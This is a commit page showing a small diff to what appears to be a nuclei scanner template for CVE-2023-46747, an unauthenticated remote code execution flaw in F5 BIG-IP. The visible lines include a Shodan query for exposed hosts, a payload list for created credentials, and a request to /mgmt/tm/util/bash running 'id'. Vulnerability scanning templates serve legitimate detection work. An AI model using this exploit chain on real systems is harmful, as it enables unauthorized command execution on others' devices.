Merge pull request #8500 from 0xorOne/fix-CVE-2023-46747

Fix CVE-2023-46747.yaml
projectdiscovery · Oct 31, 2023 · fba2280 · fba2280
2 parents 5320b23 + 5238b57
commit fba2280
Showing 1 changed file with 11 additions and 2 deletions.
diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml
@@ -21,6 +21,7 @@ info:
     max-request: 4
     shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
   tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive
+
 variables:
   username: "{{hex_encode(rand_base(5))}}"
   password: "{{hex_encode(rand_base(12))}}"
@@ -54,7 +55,7 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"username":"{{hex_decode(username)}}", "password":"{{password2}}"}
+        {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}
 
       - |+
         POST /mgmt/tm/util/bash HTTP/1.1
@@ -64,6 +65,13 @@ http:
 
         {"command":"run","utilCmdArgs":"-c id"}
 
+    payloads:
+      pass:
+        - '{{password2}}'
+        - '{{hex_decode(password)}}'
+
+    skip-variables-check: true
+    stop-at-first-match: true
     extractors:
       - type: regex
         part: body_2
@@ -82,8 +90,9 @@ http:
       - type: dsl
         dsl:
           - '"Username:" + hex_decode(username)'
-          - '"Password:" + password2'
+          - '"Password:" + pass'
           - '"Token:" + token'
+
     matchers:
       - type: word
         words: